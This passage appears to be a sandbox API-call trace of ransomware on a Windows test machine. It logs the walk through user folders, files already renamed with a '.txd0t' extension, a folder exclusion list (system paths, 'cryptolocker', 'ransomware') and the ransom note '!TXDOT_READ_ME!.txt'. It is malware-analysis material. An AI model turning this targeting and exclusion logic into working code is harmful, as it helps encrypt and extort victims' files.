returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.043] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="YDXeffFC99vGn.mp3.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3.txd0t" [0090.043] PathFindExtensionW (pszPath="YDXeffFC99vGn.mp3.txd0t") returned=".txd0t" [0090.043] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.043] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x200ac2e0, ftCreationTime.dwHighDateTime=0x1d5e80e, ftLastAccessTime.dwLowDateTime=0x7c772d80, ftLastAccessTime.dwHighDateTime=0x1d5e466, ftLastWriteTime.dwLowDateTime=0x50661db2, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18dc9, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Yjcpzl.ppt.txd0t", cAlternateFileName="YJCPZL~1.TXD")) returned 1 [0090.043] StrCmpW (psz1="Yjcpzl.ppt.txd0t", psz2=".") returned 1 [0090.043] StrCmpW (psz1="Yjcpzl.ppt.txd0t", psz2="..") returned 1 [0090.043] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.043] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.043] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Yjcpzl.ppt.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt.txd0t" [0090.043] PathFindExtensionW (pszPath="Yjcpzl.ppt.txd0t") returned=".txd0t" [0090.043] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.043] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75c97fc0, ftCreationTime.dwHighDateTime=0x1d5edde, ftLastAccessTime.dwLowDateTime=0x41dc0ad0, ftLastAccessTime.dwHighDateTime=0x1d5ed1a, ftLastWriteTime.dwLowDateTime=0x50687e9d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf01f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="_ZxYRX.rtf.txd0t", cAlternateFileName="_ZXYRX~1.TXD")) returned 1 [0090.043] StrCmpW (psz1="_ZxYRX.rtf.txd0t", psz2=".") returned 1 [0090.043] StrCmpW (psz1="_ZxYRX.rtf.txd0t", psz2="..") returned 1 [0090.043] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.043] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.043] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="_ZxYRX.rtf.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf.txd0t" [0090.043] PathFindExtensionW (pszPath="_ZxYRX.rtf.txd0t") returned=".txd0t" [0090.043] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.043] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75c97fc0, ftCreationTime.dwHighDateTime=0x1d5edde, ftLastAccessTime.dwLowDateTime=0x41dc0ad0, ftLastAccessTime.dwHighDateTime=0x1d5ed1a, ftLastWriteTime.dwLowDateTime=0x50687e9d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf01f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="_ZxYRX.rtf.txd0t", cAlternateFileName="_ZXYRX~1.TXD")) returned 0 [0090.043] FindClose (in: hFindFile=0xec26f0 | out: hFindFile=0xec26f0) returned 1 [0090.043] GetProcessHeap () returned 0xe30000 [0090.043] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec7a58 | out: hHeap=0xe30000) returned 1 [0090.043] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x50687e9d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x50687e9d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0090.043] FindClose (in: hFindFile=0xec2630 | out: hFindFile=0xec2630) returned 1 [0090.043] GetProcessHeap () returned 0xe30000 [0090.043] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec75a0 | out: hHeap=0xe30000) returned 1 [0090.043] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0090.043] StrCmpW (psz1="Application Data", psz2=".") returned 1 [0090.044] StrCmpW (psz1="Application Data", psz2="..") returned 1 [0090.044] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd43ecce6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2cb2cd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0090.044] StrCmpW (psz1="Contacts", psz2=".") returned 1 [0090.044] StrCmpW (psz1="Contacts", psz2="..") returned 1 [0090.044] StrCpyNW (in: psz1=0xec60f0, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0090.044] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0090.044] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Contacts", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Contacts") returned="C:\\Users\\FD1HVy\\Contacts" [0090.044] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\windows\\system32\\") returned 0x0 [0090.044] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.044] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\windows\\system\\") returned 0x0 [0090.044] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.044] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.044] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\appdata\\local\\") returned 0x0 [0090.044] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.044] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.044] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.044] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\boot\\") returned 0x0 [0090.044] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\perflogs\\") returned 0x0 [0090.044] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\programdata\\") returned 0x0 [0090.044] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\drivers\\") returned 0x0 [0090.044] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\wsus\\") returned 0x0 [0090.044] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.044] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.044] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="crypt_detect") returned 0x0 [0090.044] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="cryptolocker") returned 0x0 [0090.044] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="ransomware") returned 0x0 [0090.044] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="C:\\WINDOWS") returned 0x0 [0090.044] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.044] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="C:\\Program Files") returned 0x0 [0090.045] GetProcessHeap () returned 0xe30000 [0090.045] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xec75a0 [0090.045] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Contacts", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Contacts") returned="C:\\Users\\FD1HVy\\Contacts" [0090.045] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Contacts", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Contacts\\*") returned="C:\\Users\\FD1HVy\\Contacts\\*" [0090.045] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Contacts\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd43ecce6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2cb2cd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0090.045] StrCmpW (psz1=".", psz2=".") returned 0 [0090.045] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd43ecce6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2cb2cd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.045] StrCmpW (psz1="..", psz2=".") returned 1 [0090.045] StrCmpW (psz1="..", psz2="..") returned 0 [0090.045] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.045] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.045] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.045] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0090.045] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0090.045] GetProcessHeap () returned 0xe30000 [0090.045] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec75a0 | out: hHeap=0xe30000) returned 1 [0090.045] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0090.045] StrCmpW (psz1="Cookies", psz2=".") returned 1 [0090.045] StrCmpW (psz1="Cookies", psz2="..") returned 1 [0090.045] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x513589b8, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x513589b8, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0090.045] StrCmpW (psz1="Desktop", psz2=".") returned 1 [0090.045] StrCmpW (psz1="Desktop", psz2="..") returned 1 [0090.045] StrCpyNW (in: psz1=0xec60f0, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0090.045] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0090.045] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Desktop", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.046] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\windows\\system32\\") returned 0x0 [0090.046] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.046] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\windows\\system\\") returned 0x0 [0090.046] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.046] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.046] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\appdata\\local\\") returned 0x0 [0090.046] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.046] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.046] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.046] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\boot\\") returned 0x0 [0090.046] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\perflogs\\") returned 0x0 [0090.046] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\programdata\\") returned 0x0 [0090.046] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\drivers\\") returned 0x0 [0090.046] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\wsus\\") returned 0x0 [0090.046] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.046] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.046] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="crypt_detect") returned 0x0 [0090.046] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="cryptolocker") returned 0x0 [0090.046] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="ransomware") returned 0x0 [0090.046] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="C:\\WINDOWS") returned 0x0 [0090.046] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.046] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="C:\\Program Files") returned 0x0 [0090.046] GetProcessHeap () returned 0xe30000 [0090.046] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b0) returned 0xec75a0 [0090.046] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.046] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\*", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\*") returned="C:\\Users\\FD1HVy\\Desktop\\*" [0090.046] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x513589b8, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x513589b8, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2330 [0090.046] StrCmpW (psz1=".", psz2=".") returned 0 [0090.046] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x513589b8, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x513589b8, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.046] StrCmpW (psz1="..", psz2=".") returned 1 [0090.047] StrCmpW (psz1="..", psz2="..") returned 0 [0090.047] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x506ae2a3, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x506ae2a3, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x506ae2a3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.047] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.047] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.047] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.047] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.047] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt" [0090.047] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.047] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.047] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.047] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.047] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.047] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.047] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.047] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.047] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.047] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.047] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.047] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.047] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.047] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.047] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.047] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.047] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5eb7b760, ftCreationTime.dwHighDateTime=0x1d5e678, ftLastAccessTime.dwLowDateTime=0x73a94270, ftLastAccessTime.dwHighDateTime=0x1d5e5c8, ftLastWriteTime.dwLowDateTime=0x506ae2a3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x137f2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="3475V2DB.pdf.txd0t", cAlternateFileName="3475V2~1.TXD")) returned 1 [0090.047] StrCmpW (psz1="3475V2DB.pdf.txd0t", psz2=".") returned 1 [0090.047] StrCmpW (psz1="3475V2DB.pdf.txd0t", psz2="..") returned 1 [0090.047] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.047] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.047] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="3475V2DB.pdf.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf.txd0t" [0090.047] PathFindExtensionW (pszPath="3475V2DB.pdf.txd0t") returned=".txd0t" [0090.047] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.047] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x355c0030, ftCreationTime.dwHighDateTime=0x1d5e176, ftLastAccessTime.dwLowDateTime=0xab01ed50, ftLastAccessTime.dwHighDateTime=0x1d5e193, ftLastWriteTime.dwLowDateTime=0x506d4431, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11b34, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="5dJ40KpaZH5gABK Wvl.xls.txd0t", cAlternateFileName="5DJ40K~1.TXD")) returned 1 [0090.047] StrCmpW (psz1="5dJ40KpaZH5gABK Wvl.xls.txd0t", psz2=".") returned 1 [0090.047] StrCmpW (psz1="5dJ40KpaZH5gABK Wvl.xls.txd0t", psz2="..") returned 1 [0090.047] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.048] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.048] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="5dJ40KpaZH5gABK Wvl.xls.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls.txd0t" [0090.048] PathFindExtensionW (pszPath="5dJ40KpaZH5gABK Wvl.xls.txd0t") returned=".txd0t" [0090.048] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.048] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26738d40, ftCreationTime.dwHighDateTime=0x1d5eddd, ftLastAccessTime.dwLowDateTime=0x866074e0, ftLastAccessTime.dwHighDateTime=0x1d5e9ad, ftLastWriteTime.dwLowDateTime=0x506fa698, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11d96, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="5WpFV5we BjOWCFQ_8P.png.txd0t", cAlternateFileName="5WPFV5~1.TXD")) returned 1 [0090.048] StrCmpW (psz1="5WpFV5we BjOWCFQ_8P.png.txd0t", psz2=".") returned 1 [0090.048] StrCmpW (psz1="5WpFV5we BjOWCFQ_8P.png.txd0t", psz2="..") returned 1 [0090.048] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.048] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: 